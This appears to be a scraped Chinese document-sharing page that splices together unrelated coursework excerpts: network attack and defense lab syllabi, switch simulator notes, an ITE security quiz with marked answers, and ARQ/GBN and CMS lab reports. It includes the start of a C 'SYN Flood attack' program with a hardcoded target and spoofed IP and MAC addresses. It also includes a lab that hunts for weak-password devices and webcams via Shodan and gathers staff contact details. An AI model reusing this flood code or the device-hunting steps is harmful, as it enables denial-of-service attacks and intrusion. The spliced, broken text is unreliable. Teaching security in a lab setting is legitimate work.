网络攻防原理与技术实验第2-3章

网络攻防原理与技术实验第2-3章
网络攻防原理与技术实验第2-3章

第2章密码学基础知识

2.7 实验

2.7.1 DES数据加密、解密算法实验

1. 实验目的

通过实验,让学生充分理解和掌握DES算法。

2. 实验内容与要求

(1)编程实现DES加解密软件,并调试通过。

(2)利用DES对某一数据文件进行单次加密和解密操作。

(3)提供大素数生成功能:可产生长度最大可达300位16进制(约合360位10进制数)

的大素数,可以导出素数,也可以从文件中导入素数,也可以产生一个指定长度的随机大素数。

(4)界面简洁、友好,便于操作。

3. 实验环境

(1) 平台:Windows或Linux。

(2) 编程语言:C、C++、Python任选一,建议由教师指定。

(3) DES加密、解密函数库(由教师提供,或要求学生从互联网上搜索下载)。

2.7.2 RSA数据加密、解密算法实验

1. 实验目的

通过实验,让学生充分理解和掌握RSA算法。

2. 实验内容与要求

(1)编程实现RSA加解密软件,并调试通过。

(2)利用RSA对某一数据文件进行单次加密和解密操作。

(3)界面简洁、友好,便于操作。

3. 实验环境

(1) 平台:Windows或Linux。

(2) 编程语言:C、C++、Python任选一,建议由教师指定。

(3) RSA加密、解密函数库(由教师提供,或要求学生从互联网上搜索下载)。

第3 章网络侦察技术

3.6 实验

3.6.1 站点信息查询

1. 实验目的

培养学生综合运用搜索引擎、Whois数据库、DNS、社会工程学等手段对目标站点进行侦察的能力,了解站点信息查询常用的信息源及搜索工具,熟悉掌握常见搜索工具的功能及使用技巧。

2. 实验内容与要求

(1) 获得目标站点的相关信息(尽可能包含所有项):域名服务注册信息,包括:注册商名称及IP地址、注册时间、域名分配的IP地址(段)、注册人联系信息(姓名、邮箱、电话、办公地址);相关IP地址信息,如DNS、邮件服务器、网关的IP地址。

(2) 站点所属机构的相关信息(尽可能包含所有项):业务信息、主要负责人信息(姓

名、邮箱、电话、办公地址、简历等)、有合作关系的单位名称及网址。

(3) 所有查询输入及结果均需截图,并写入实验报告中。

3. 实验环境

(1) 互联网环境。

(2) 目标域名由教师指定,建议选择有一定影响力的商业公司门户网站的域名或使用本单位门户网站域名。

3.6.2 联网设备查询

1. 实验目的

培养学生使用搜索引擎在互联网查找特定设备的能力,熟悉联网设备搜索引擎的功能,熟练掌握设备搜索引擎的使用方法。

2. 实验内容与要求

(1) 查找指定地域内有弱口令、可匿名登录的网络设备(路由器、网关、Server等),并返回其IP地址。

(2) 查找指定地域内网络摄像头,并返回其IP地址。

(3) 实验过程中只允许浏览搜索结果。对搜索到的可远程控制的设备,应禁止学生对这些设备进行远程控制。

(4) 所有查询输入及结果均需截图,并写入实验报告中。

3. 实验环境

(1) 互联网环境。

(2) 搜索引擎Shodan或ZoomEye。

(3) 搜索地域(国家、城市、区、街道、经纬度等)由教师指定或学生自主确定。

计算机网络基础模拟器实验报告

计算机网络模拟器实验报告 实验说明:共5个实验,其中前3个必做,后2个选做。 一、实验目的 1、掌握模拟器软件的使用方法; 2、掌握配置PC、交换机、路由器的方法; 3、掌握为交换机设置VLAN,为端口设置TRUNK的方法。 二、实验环境(请注意关闭杀毒软件) WinXP/WIN7、HW-RouteSim 2.2(软件请到BB课程 资源下载,下载后直接解压缩运行;下载前请关闭 杀毒软件) 三、实验步骤及结果 实验一:计算机和交换机基本设置 添加一个交换机,两个计算机,连接A电脑到交换机3号端口,B电脑到6号端口,双击交换机,进入终端配置: system password: [Quidway]sysname S3026 ;交换机重命名为S3026

[S3026]super password 111 ;设置特权密码为111 [S3026]quit sys password:111 [S3026]display currect-config ;查看当前所有配置[S3026]display vlan all ;查看当前VLAN设置 观察此时所有交换机端口都在同一个vlan1内。 双击小电脑A: login:root password:linux [root@PCAroot]# ? ;输入?号查看命令提示 [root@PCAroot]#ifconfig eth0 10.65.1.1 netmask 255.255.0.0 双击小电脑B: login:root password:linux [root@PCAroot]#ifconfig eth0 10.65.1.2 netmask 255.255.0.0 点击A电脑做测试: [root@PCA root]#ping 10.65.1.2

网络攻防原理与技术源代码

/*=================================================== * 基于winpcap的多线程SYN Flood攻击源代码 * 运行平台:WinXP,Win2k3,WinVista,Win2k8,Win7 * 编译环境:VC6.0 + winpcap SDK *====================================================*/ #define WIN32_LEAN_AND_MEAN #define _WSPIAPI_COUNTOF #include #include #include #include #include #include #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "wpcap.lib") #pragma comment(lib, "packet.lib") #define MAXTHREAD 20 #define OID_802_3_CURRENT_ADDRESS 0x01010102 #define OPTION_LENTH 6 #define SYN_DEST_IP "192.168.0.22" // 被攻击的IP #define SYN_DEST_PORT 80 // 被攻击的PORT #define FAKE_IP "192.168.0.11" // 伪装的IP #define FAKE_MAC "\xB8\xAC\x6F\x1F\x26\xF6" // 伪装的MAC // 内存对齐设置必须是1 #pragma pack(1) typedef struct et_header // 以太网首部 { unsigned char eh_dst[6]; // 目的MAC unsigned char eh_src[6]; // 源MAC unsigned short eh_type; // 上层协议类型 }ET_HEADER; typedef struct ip_hdr // IP首部 { unsigned char h_verlen; // 版本与首部长度 unsigned char tos; // 区分服务 unsigned short total_len; // 总长度 unsigned short ident; // 标识 unsigned short frag_and_flags; // 3位的标志与13位的片偏移

计算机组成原理--实验报告

实验一寄存器实验 实验目的:了解模型机中各种寄存器结构、工作原理及其控制方法。 实验要求:利用CPTH 实验仪上的K16..K23 开关做为DBUS 的数据,其它开关做为控制信号,将数据写入寄存器,这些寄存器包括累加器A,工作寄存器W,数据寄存器组R0..R3,地址寄存器MAR,堆栈寄存器ST,输出寄存器OUT。 实验电路:寄存器的作用是用于保存数据的CPTH 用74HC574 来构成寄存器。74HC574 的功能如下: - 1 -

实验1:A,W 寄存器实验 原理图 寄存器A原理图 寄存器W 原理图连接线表: - 2 -

- 3 - 系统清零和手动状态设定:K23-K16开关置零,按[RST]钮,按[TV/ME]键三次,进入"Hand......"手动状态。 在后面实验中实验模式为手动的操作方法不再详述. 将55H 写入A 寄存器 二进制开关K23-K16用于DBUS[7:0]的数据输入,置数据 55H 置控制信号为: 按住STEP 脉冲键,CK 由高变低,这时寄存器A 的黄色选择指示灯亮,表明选择A 寄存器。放开STEP 键,CK 由低变高,产生一个上升沿,数据55H 被写入A 寄存器。 将66H 写入W 寄存器 二进制开关K23-K16用于DBUS[7:0]的数据输入,置数据66H

置控制信号为: 按住STEP脉冲键,CK由高变低,这时寄存器W 的黄色选择指示灯亮,表明选择W寄存器。放开STEP 键,CK 由低变高,产生一个上升沿,数据66H 被写入W 寄存器。 注意观察: 1.数据是在放开STEP键后改变的,也就是CK的上升沿数据被打入。 2.WEN,AEN为高时,即使CK有上升沿,寄存器的数据也不会改变。 实验2:R0,R1,R2,R3 寄存器实验 连接线表 - 4 -

通信网络基础实验报告

通信网络基础实验 报告 学号:。。。 姓名:。。。 专业:通信工程 指导老师:孙恩昌 完成时间:2015-12-27

目录 一.实验目的 (3) 二.实验内容 (3) 三.实验原理 (3) 四.实现停等式ARQ实验过程及结果: (5) 五.实现返回n-ARQ实验过程及结果: (7) 六.实现选择重发式ARQ过程及结果: (8) 七.心得体会 (10)

一.实验目的 1.理解数据链路层ARQ协议的基本原理 2.用算法实现四种不同形式的ARQ重传协议:停等式ARQ、返回n-ARQ、选择重发式ARQ和ARPANET ARQ。 3.提高分析和解决问题的能力和提高程序语言的实现能力 二.实验内容: 1.根据停等式ARQ协议基本理论,编写协议算法,进行仿真; 2.根据返回N-ARQ协议基本理论,编写协议算法,进行仿真; 3.根据选择重传ARQ协议基本理论,编写协议算法,进行仿真; 4.根据并行等待ARQ协议基本理论,编写协议算法,进行仿真 三.实验原理 1.停等式ARQ:在开始下一帧传送出去之前,必须确保当前帧已被正确接受。假定A到B的传输链路是正向链路,则B到A的链路称为反向链路。在该链路上A要发送数据帧给B,具体的传送过程如下: 发送端发出一个包后,等待ACK,收到ACK,再发下一个包,没有收

到ACK、超时,重发 重发时,如果ACK 不编号,因重复帧而回复的ACK,可能被错认为对其它帧的确认。 2. 返回n-ARQ:发送方和接收方状态示意图 返回n-ARQ方案的特点如下: (1)发送方连续发送信息帧,而不必等待确认帧的返回; (2)在重发表中保存所发送的每个帧的备份; (3)重发表按先进先出(FIFO)队列规则操作; (4)接收方对每一个正确收到的信息帧返回一个确认帧,每一个确认帧包含一个惟一的序号,随相应的确认帧返回; (5)接收方保存一个接收次序表,包含最后正确收到的信息帧的序号。当发送方收到相应信息帧的确认后,从重发表中删除该信息帧的备份;

网络原理实验报告实验八南华大学

网络原理实验报告 学院:计算机科学与技术学院专业: 姓名: 学号:

实验八路由器的基本配置 实验目的: 了解基本的路由器配置操作 实验步骤: 路由器的模式切换与交换的基本相同 1.(截图找不到了,最后才截图)配置路由器的名称 在全局模式下输入hostname XXXXX 可退出至特权模式下验证 2.配置路由器接口并查看接口配置 在全局配置模式下进入接口配置模式(这里注意路由器接口的写法与交换机有区别,可先用show命令查看一下) 在接口配置模式下配置接口IP地址:ip address 192.168.1.1 255.255.255.0 开启该端口No shutdown 回到特权模式查看配置

3.查看路由器的配置 Show version Show ip route Show running-config 注意show interface和show ip interface的区别

4. 配置静态路由 设置到子网10.1.1.0 的静态路由,采用下一跳的方式 在全局配置模式Ip route 10.1.1.0 255.255.255.0 192.168.1.2 设置到子网10.2.2.0 的静态路由,采用出站端口的方式 在全局配置模式Ip route 10.2.2.0 255.255.255.0 s4/0 配置完成以后,在特权模式下查看路由表和接口配置(思考,为什么不能显示路由)

5. 封装PPP协议 进入全局配置模式后,用interface serial x/y进入串口在此串口上封装PPP:encapsulation ppp 回到特权模式show 此串口。

网络原理实验报告CMS

1、内容管理系统(CMS)的基本概念 CMS是Content Management System的缩写,意为“内容管理系统”,指Web内容的管理。内容管理系统是一种位于WEB前端(Web 服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容管理解决方案重点解决各种非结构化或半结构化的数字资源的采集、管理、利用、传递和增值,并能有机集成到结构化数据的商业智能环境中,如OA,CRM等。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的"内容"可能包括文件、表格、图片、Flash动画、声像流、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet网站的信息。 CMS其实是一个很广泛的称呼,从一般的博客程序,新闻发布程序,到综合性的网站管理程序都可以被称为内容管理系统。CMS具有许多基于模板的优秀设计,可以加快网站开发的速度和减少开发的成本 2、内容管理系统的分类和选择 根据其功能进行分类: 框架型:本身不包含任何应用实现,只是提供了底层框架,具体应用需要一定的二次开发,比如Cocoon,Vignette; 应用型:本身是一个面向具体类型的应用实现,已经包含了新闻/评论管理,投票,论坛,WIKI等一些子系统。比如:postNuke ,xoops等; 3、门户类内容管理系统:PostNuke 实验设备及软件: Windows XP操作系统 Apache Friends 1.0 PostNuke 0.726CN的Winzip压缩包 实验步骤: 1、获取XAMPP的压缩包文件解压缩至指定目录(d:\xampp) 2、修改Apache配置文件D:\xampp\apache\conf\httpd.conf 将:AddDefaultCharSet ISO-8859-1 改为:AddDefaultCharSet GB2312 3、双击“setup_xampp.bat”开始安装 选项:1 安装MOD_PERL,否则选择2 双击“apache_start”,启动Apache服务器 双击“mysql_start”,启动MySQL服务器

网络原理实验报告(GBN)

网络原理实验报告 ——编程模拟GBN 姓名: 班级: 学号: 教师: 1.实验目的 运用各种编程语言实现基于Go-Back-N的可靠数据传输软件。 PS:这里使用的是JAVA语言 2.实验意义 通过本实验,使学生能够对可靠数据传输原理有进一步的理解和掌握。 3.实验背景 Go-Back-N的有限状态机模型表示如下图所示: (a) (b) 图为Go-Back-N的有限状态机模型(a)发送端(b)接受端 4.实验步骤 (1)选择合适的编程语言编程实现基于Go-Back-N的可靠数据传输软件。 (2)在实际网络环境或模拟不可靠网络环境中测试和验证自己的可靠数据传输软件。

5.实验环境 (1)实验语言:JAVA (2)实验平台:Eclipse (3)引用库函数:.net库、随机(Random)库、计时库(Timer)6.类概览与描述 (1)Sender类:继承于Thread(线程)类,模拟发送方的一切功能,主要功能函数有: A.Public void run()——启动函数,标识开始发送数 据包 B.Sender()——构造函数,分配并初始化窗口值 C.Public void getack(in tack)——ACK接收函数,接 收接收方返回的ACK并进行验证是否为期待的 ACK值(若不是,则重发) D.Public void time()——定时器函数,初始化定时, 计时并记录超时与否的状态 (2)Receiver类:继承于Thread(线程)类,模拟接收方的一切功能,主要功能函数有: A.Public void run()——启动函数,标识开始等待并 接收数据包 B.Void Receive(int data,Sender s)——数据包接收函 数,功能强大!主要包括:接收数据包,验证 数据包,判断与丢弃数据包等

ITE第十章考试答案

使用某台Windows 7 计算机的所有用户都能够安装未经授权的软件。除了对用户进行安全行为培训外,还应该执行哪项操作来解决此问题? 在计算机上启用UAC。 将用户文件权限更改为只读。 将用户文件夹权限设置为拒绝。 禁用用户的帐户。 某无线路由器上配置了端口触发。已将端口25 定义为触发端口,端口113 定义为开这对网络流量有什么影响? 由端口25 传入内部网络的所有流量也允许使用端口113。 由端口25 发送出去的所有流量将打开端口113,从而让入站流量通过端口113 进入内部网络。 任何使用端口25 传出内部网络的流量也允许通过端口113 发送出去。 任何传入端口25 的流量都允许使用传出端口113。 用户反映,计算机的Web 浏览器即使重置默认页也不能显示正确的主页。此问题的可是什么? 计算机感染了间谍软件。 计算机上禁用了UAC。 文件夹权限从拒绝更改成了允许。 病毒损坏了系统磁盘的启动扇区。 哪项物理安全技术可以保存用户身份验证信息(包括软件许可证保护),提供加密,以对应于主机系统的硬件和软件身份验证? 受信任的平台模块(TPM) 凭钥匙卡出入 生物识别身份验证 双重安全 蠕虫具有下列哪两项特征?(选择两项。) 当软件在计算机上运行时执行 隐藏在潜伏状态下,等待攻击者的需要 在用户无任何干预或不知情的情况下传播到新的计算机

自我复制 通过附加在软件代码上而感染计算机 哪种类型的安全威胁使用的电子邮件看起来是来自合法的发件人,并且要求电子邮件收问某个网站并输入机密信息? 隐蔽式病毒 网络钓鱼 蠕虫 广告软件 DoS 攻击的主要目标是什么? 获得服务器地址簿中的所有地址 阻止目标服务器处理其它请求 扫描目标服务器上的数据 方便访问外部网络 下列哪项措施可以帮助技术人员确定拒绝服务攻击是否由主机上的恶意软件引起? 将主机与网络断开。 在主机上安装流氓杀毒软件。 禁用主机上的ActiveX 和Silverlight。 以其他用户身份登录主机。 什么方法可以最有效地保护无线流量安全? WEP SSID 隐藏 无线MAC 过滤 WPA2 用户接到一个电话,对方声称自己是IT 服务代表,然后要求用户确认用户名和口令供用。这个电话代表了哪一种安全威胁? 垃圾邮件 社会工程 匿名键盘记录 DDoS

计算机控制基础实验报告

重庆交通大学 学生实验报告 实验课程名称机械工程控制基础 开课实验室交通装备与制造工程实训中心 学院机电与汽车工程学院年级 2012专业班机械电子工程(2)学生姓名学号 开课时间 2014 至 2015 学年第二学期

验证性设计性综合性

ans = (1/2)^n (2) ) 1.0)(8.0()(2 --=z z z z F syms z >> f=((z^2)/((z-0.8)*(z-0.1))) f = z^2/((z - 4/5)*(z - 1/10)) >> iztrans(f) ans = (8*(4/5)^n)/7 - (1/10)^n/7 实验项目 系统分析 实验时间 实验地点 90304 实验性质 验证性 设计性 综合性 教师评价: 评价教师签名: 第三章:计算机控制系统的分析 1 试求如题图 3.1所示的采样控制系统在单位阶跃信号作用下的输出响应)(*t y 。设 ) 10(*20 )(+= s s s G ,采样周期T=0.1s 。

解: gs=tf([20],[1 10 0]); gz=c2d(gs,0.1,'imp'); gzb1=gz/(gz+1); gzb2=feedback(gz,1); y=step(gzb1); step(gzb1,gzb2); 结果: 2 试求如题图3.1所示的采样控制系统在单位速度信号作用下的稳态误差。 设) 11.0(1 )(+= s s s G ,采样周期T=0.1s. 解: gs=tf([1],[0.1 1 0]); T=0.1; gz=c2d(gs,T,'imp'); gzb=feedback(gz,1); rz = tf([0.1 0],[1 -2 1],T); rz1 = zpk([0],[1 1],T,T); yz=rz*gzb; impulse(yz); t=[0:0.1:10]'; ramp=t; lsim(gzb,ramp,t) [y,t1] = lsim(gzb,ramp,t); ER = ramp - y

计算机组成原理实验报告(运算器组成、存储器)

计算机组成原理实验报告 一、实验1 Quartus Ⅱ的使用 一.实验目的 掌握Quartus Ⅱ的基本使用方法。 了解74138(3:8)译码器、74244、74273的功能。 利用Quartus Ⅱ验证74138(3:8)译码器、74244、74273的功能。 二.实验任务 熟悉Quartus Ⅱ中的管理项目、输入原理图以及仿真的设计方法与流程。 新建项目,利用原理编辑方式输入74138、74244、74273的功能特性,依照其功能表分别进行仿真,验证这三种期间的功能。 三.74138、74244、74273的原理图与仿真图 1.74138的原理图与仿真图 74244的原理图与仿真图

1. 4.74273的原理图与仿真图、

实验2 运算器组成实验 一、实验目的 1.掌握算术逻辑运算单元(ALU)的工作原理。 2.熟悉简单运算器的数据传送通路。 3.验证4位运算器(74181)的组合功能。 4.按给定数据,完成几种指定的算术和逻辑运算。 二、实验电路 附录中的图示出了本实验所用的运算器数据通路图。8位字长的ALU由2片74181构成。2片74273构成两个操作数寄存器DR1和DR2,用来保存参与运算的数据。DR1接ALU的A数据输入端口,DR2接ALU的B数据输入端口,ALU的数据输出通过三态门74244发送到数据总线BUS7-BUS0上。参与运算的数据可通过一个三态门74244输入到数据总线上,并可送到DR1或DR2暂存。 图中尾巴上带粗短线标记的信号都是控制信号。除了T4是脉冲信号外,其他均为电位信号。nC0,nALU-BUS,nSW-BUS均为低电平有效。 三、实验任务 按所示实验电路,输入原理图,建立.bdf文件。 四.实验原理图及仿真图 给DR1存入01010101,给DR2存入10101010,然后利用ALU的直通功能,检查DR1、

网络实验报告总结.doc

实验 1 PacketTrace基本使用 一、实验目的 掌握 Cisco Packet Tracer软件的使用方法。 二、实验任务 在 Cisco Packet Tracer中用HUB组建局域网,利用PING命令检测机器的互通性。 三、实验设备 集线器( HUB)一台,工作站PC三台,直连电缆三条。 四、实验环境 实验环境如图1-1 所示。 图 1-1交换机基本配置实验环境 五、实验步骤 (一)安装模拟器 1、运行“ PacketTracer53_setup”文件,并按如下图所示完成安装; 点“ Next ”

选择“ I accept the agreement”后,点“ next”不用更改安装目录,直接点“ next ” 点“ next ”

点“ next ” 点“ install”

正在安装 点“ Finish ”,安装完成。 2、进入页面。 (二)使用模拟器 1、运行Cisco Packet Tracer 软件,在逻辑工作区放入一台集线器和三台终端设备PC,用 直连线按下图将HUB 和PC工作站连接起 来, HUB端 接 Port 口, PC端分别接以太网口。

2、分别点击各工作站PC,进入其配置窗口,选择桌面项,选择运行IP 地址配置(IP Configuration ),设置IP 地址和子网掩码分别为PC0:1.1.1.1 ,255.255.255.0 ;PC1:1.1.1.2 ,255.255.255.0 ; PC2: 1.1.1.3 , 255.255.255.0 。 3、点击 Cisco Packet Tracer软件右下方的仿真模式按钮,如图1-2所示。将Cisco Packet Tracer的工作状态由实时模式转换为仿真模式。 图1-2 按Simulation Mode 按钮 4、点击PC0进入配置窗口,选择桌面Desktop 项,选择运行命令提示符Command Prompt,如图1-3 所示。 图5、在上述DOS命令行窗口中,输入(Simulation Panel)中点击自动捕获1-3进入PC配置窗口 Ping 1.1.1.3命令,回车运行。然后在仿真面板 / 播放( Auto Capture/Play)按钮,如图1-4 所示。 图 1-4 点击自动抓取 /运行按钮 6、观察数据包发送的演示过程,对应地在仿真面板的事件列表( 的类型。如图1-5 和图 1-6 所示。 Event List )中观察数据包

计算机原理5.3实验报告

计算机原理5.3实验报告 篇一:计算机原理实验四报告 实验四接口程序设计编程训练 学院(系):信通学院专业:通信工程班级:通信工程1101 姓名:张非凡学号:201181145 一、实验目的: 1. 掌握使用8255并行接口连接拨动开关,控制LED显示输出的技术。掌握循环结构程序 设计的方法。 2. 熟悉8254在系统中的电路接法,掌握8254的工作方式及应用编程。熟悉汇编语言分支 程序基本指令的使用方法。 3. 了解8259中断控制器的基本使用,掌握中断程序编程技术。熟悉利用汇编语言子程序 参数传递方法。

二、实验原理: 拨动开关和LED显示实验: 8255端口地址有四个,由于8255片选信号线与地址译码区的0~FH连接,即8255的I/O偏移地址为0~3,加上前一个实验所获知的I/O基址,两者相加之后才是最终访问8255的I/O地址。注意,该地址一定是一个16位数,所以I/O操作要使用IN AL,DX 和OUT DX, AL指令。 端口地址:A口地址为:200h;B 口地址为:201h;C口地址为:202h;控制口地址为:203h。8254定时/计数器实验: 8254是可编程间隔定时器。它具有以下基本功能:(1)有3个独立的16位计数器; (2)每个计数器可接二进制或十进制(BCD)计数;(3)每个计数器可编程工作于6种不同工作方式;(4)8254每个计数器允许的最高频率为10MHZ; (5)8254有读回命令,除了可以读

出当前计数单元的内容外,还可以读出状态寄存器的内容; (6)计数脉冲可以是有规律的时钟信号,也可以是随机信号。计数初值公式为n=f/f,其中f是输入时钟脉冲的频率,f是输出波形的频率。8254的工作方式如下述: (1)方式0:计数到0结束输出正跃变信号方式。(2)方式1:硬件可重触发单稳方式。(3)方式2:频率发生器方式。(4)方式3:方波发生器。 (5)方式4:软件触发选通方式。(6)方式5:硬件触发选通方式8259中断控制器实验: 1. 8259中断控制器介绍 8259中断控制器是Intel公司专为控制优先级中断而设计的芯片。它将中断源识别、排队以及提供中断矢量等电路集于一片中。 只需对8259编程一片8259就可以管理8级中断,最多可用9片8259A来

第10章 计算机信息系统安全 习题与答案

第10章计算机信息系统安全习题(P257-258) 一、复习题 1、计算机网络系统主要面临哪些威胁 答:由于黑客的攻击、管理的欠缺、网络的缺陷、软件的漏洞或“后门”,还有网络内部的威胁(比如用户的误操作,资源滥用和恶意行为使得再完善的防火墙也无法抵御来自网络内部的攻击,也无法对网络内部的滥用做出反应)等安全问题的根源。网络信息安全主要面临以下威胁。 非授权访问:非授权访问主要有以下几种形式:假冒、身份攻击、非法用户进入网络系统进行违法操作、合法用户以未授权方式进行操作等。非授权访问的威胁涉及到受影响的用户数量和可能被泄露的信息。入侵是一件很难办的事,它将动摇人的信心。而入侵者往往将目标对准政府部门或学术组织。 信息泄漏或丢失:指敏感数据在有意或无意中被泄漏出去或丢失,它通常包括,信息在传输中丢失或泄漏,信息在存储介质中丢失或泄漏,通过建立隐蔽隧道等窃取敏感信息等。具有严格分类的信息系统不应该直接连接Internet。 破坏数据完整性:以非法手段窃得对数据的使用权,删除、修改、插入或重发某些重要信息,以取得有益于攻击者的响应;恶意添加,修改数据,以干扰用户的正常使用。 拒绝服务攻击:拒绝服务攻击不断对网络服务系统进行干扰,改变其正常的作业流程,执行无关程序使系统响应减慢甚至瘫痪,使合法用户被排斥而不能进入计算机网络系统或不能得到相应的服务。 利用网络传播病毒,通过网络传播计算机病毒,其破坏性大大高于单机系统,而且用户很难防范。 2、简述计算机网络信息系统的安全服务与安全机制。 答:通常将为加强网络信息系统安全性及对抗安全攻击而采取的一系列措施称为安全服务。ISO7498-2中定义的5类安全服务是:数据完整性,鉴别,数据保密,访问控制,不可否认,这5类安全服务同面的安全目标的5个方面基本对应。 安全机制是实现安全服务的技术手段,表现为操作系统、软硬件功能部件、管理程序以及它们

网络技术基础实验报告

《网络技术基础》实验报告 姓名:肖婷婷 学号:1230060197

实验1 计算机局域网的硬件连接 本组成员姓名以及学号:日期: 肖婷婷1230060197 蔡凯旋1230060175 估计时间:135分钟 1—1实验目的 1、学习双绞线的使用方法 2、掌握使用双绞线作为传输介质,以集线器为中心设备组件小型局域网的硬件连接方法 3、掌握配置局域网中IP地址的方法 1—2实验设备 1、非屏蔽5类双绞线、水晶头若干、专用压线钳 2、集线器(HUB)1台。 3、测线器 4、微机:3台,能运行windows 2000及以上版本 1--3实验内容 1、了解实验室工作台的布局 2、利用双绞线以及水晶头,按照双绞线的排列顺序做直通线和交叉线 3、掌握测量直通线和交叉线的方法 4、利用作好的双绞线以及集线器通过硬件在本工作台组建局域网 1—4实验原理 1、局域网组件过程中的硬件安装以及连接是相对简单但非常重要的环节,其中涉及到网卡的安装,网线的制作、网络的连接、网络操作系统的安装、站点属性的配置等工作。我们主要对双绞线制作及连接进行操作。 双绞线的传输距离比较短,一般为100米。由于我们实验中采用集线器作为互连设备来组件小型的局域网,即同一工作台上的3台计算机互连,因此选择选用双绞线作为传输介质。 5 类线由4对双绞线组成,分别标识为白橙/橙、白绿/绿、白蓝/蓝、白棕/棕,每种颜色的花色线和纯色线为一对。根据数字信号的编码和导线衰减特性的不同,双绞线的传输速率有所变化,最高可达1000Mbit/s。

2、根据连接方式的不同,双绞线分为直通线和交叉线。如下图所示。用户设备和网络设备之间(如用户计算机的网卡和集线器之间)使用直通双绞线;用户设备和用户设备之间或网络设备和网络设备之间(如集线器的级联,或两台计算机通过双绞线直接连接),需要使用交叉双绞线连接。 1—5实验步骤 1、按照EIA/TIA-568标准排列双绞线电缆线对,每组做3条直通双绞线,3条交叉双绞线。 注意事项:使用压线钳时,要用力,使得水晶头中的金属针能与双绞线电缆中的导线完全接触。 2、使用测线器测量所做电缆是否连通,以及使用测线器区分直通双绞线和交叉双绞线。 直通双绞线测量时的现象: 对应的线亮(11 22 33 44 55 66 77 88 ) 交叉双绞线的测量现象: 对应的线亮(13 26 31 45 54 62 77 88 ) 3、 (1)利用交叉双绞线连接相同两台计算机的网卡,使两台计算机互通信息; (2)利用集线器将3台计算机互连,构成以太网,用直通双绞线,一端连接网卡,一段连接集线器。

计算机网络原理实验七、传输层可靠传输协议GBN编程实验报告

实验七、传输层可靠传输协议G B N编程实验报告序号:姓名:学号:成绩指导老师: 一、实验目的: 1、通过编写实现一个简单可靠的数据传输协议GBN的发送和接收代码,模拟可靠数据传输 2、理解TCP协议可靠传输的差错检测、重传、累计确认、定时器的可靠传输策略。 二、实验原理: 在GBN中,发送端不需要在接收到上一个数据包的ACK后才发送下一个数据包,而是可以连续发送数据包。在发送端发送数据包的过程中,如果接收到对应已发送的某个数据包的NACK,则发送端将NACK对应的某个数据包进行重发,然后再将该数据包之后的数据包依次进行重发。 三、结果分析: 本次试验中采用java语言进行程序编写 代码注释: (一)S ender类 import java.util.Timer; public class Sender extends Thread{ public int windowsize=3; //发送方窗口长度设为3 public String[] data={"data1","data2","data3", "data4","data5","data6","data7"}; //模拟七个数据包public int sign[]={0,1,2,3,4,5,6}; //为7个数据包标号 public int localack=-1; //保存最近收到的ACK public Timers litime=null; //定时器(这里定为2秒) public int switches=0; //超时标志,1为超时 public int windowsign[]; //当前窗口内待发的数据分组的序号 public int acksign=0;

计算机网络基础课内实验报告

《计算机网络基础》 课内实验 学部:经济与管理学院

专业:市场营销(网络营销) 班级: 学号: 姓名: 指导教师: 唐芳萍 2016年6月21日 实验一用双绞线制作网线(3课时)一、实验目的: 1.了解RJ-45接口标准; 2.理解直通线、交叉线使用场合; 3.掌握双绞线的的两种制作规范、制作步骤; 4.掌握剥线钳、压线钳的使用; 5.掌握双绞线网线连通性的测试方法。 二、实验设备 名称规格数量说明 双绞线>2m 1段/组 水晶头RJ-45 3个/组

压线钳RJ-45 1套/组 三、实验内容和要求 各小组制作直通线、交叉线各一条,长度均为1.5M 。 四、实验结果 1 、根据实际制作结果填写交叉线两端的连线情况。连线是否正确?如不正确,为什么为错?

2 、根据实际制作结果填写直通线两端的连线情况。连线是否正确?如不正确,为什么为错? 3 、描述直通线和交叉线在测试仪上两端指示灯怎样闪亮网线才算制作合格。 直通线:两端测试灯都是1-8顺序显示 交叉线:交叉线1-3,2-6是拧着的,其他顺序,也就是一端显示1另一端显示3,一端显示2另一端显示6。 4 、双绞线中的一对线缆为何要绞在一起,其作用是什么? 双绞线中的线缆为何要成对地绞一起,其作用是:一对线中只有一个根是起信号传输的,另一条是起屏蔽作用的。使信号在远离传输使避免发生错误。

实验二交换机的自动学习功能(3课时)一、实验目的: 1.比较集线器和交换机的本质区别;

2.深入理解交换机的工作原理; 3. 掌握安装和配置网络模拟器软件PacketTracer 的方法。 二、实验条件 1.运行Windows 2008 Server/XP/7/8操作系统的PC; 2.PC上已安装PacketTracer 软件。 二、实验内容 拓扑图如下: ABCD4台主机都是同一个子网的,可以用私有地址分配给每台主机 1.主机配置IP地址后,查看SW的mac-address-table

计算机网络原理实验报告

计 算 机 网 络 实 验 报 告 学校:中原工学院 学院:计算机学院 班级:网络092 学生:李东杰 学号:200900824217 日期:2010年12月25日

实验1 WIN32网络配置命令使用 一、实验内容: 网络测试工具—PING.EXE 网络配置查看程序—IPCONFIG.EXE 网络链接统计工具—NETSTA T.EXE 操纵网络路由表的工具—ROUTE.EXE 地址解析工具—APR.EXE 路由跟踪工具—TRACERT.EXE 二、教学目的、要求: 了解WIN32操作系统提供的各种网络功能的命令。熟悉WIN32操作系统提供的各种网络命令的使用方法和输出格式。 三、教学重点及难点 掌握命令输出项的含义 三、实验步骤 1、最常用的网络测试工具-PING.EXE 作用:Ping的主要作用是验证与远程计算机的连接。该命令只有在安装了TCP/IP 协议后才可以使用。 原理:向远程计算机通过ICMP协议发送特定的数据包,然后等待回应并接收返回的数据包,对每个接收的数据包均根据传输的消息进行验证。默认情况下,传输四个包含32 字节数据(由字母组成的一个循环大写字母序列)的回显数据包。过程如下: (1)(1)通过将ICMP 回显数据包发送到计算机并侦听回显回复数据包来验证与一台或多台远程计算机的连接。 (2)(2)每个发送的数据包最多等待一秒。 (3)(3)打印已传输和接收的数据包数。 用法:ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list

计算机网络基础应用实训指导书

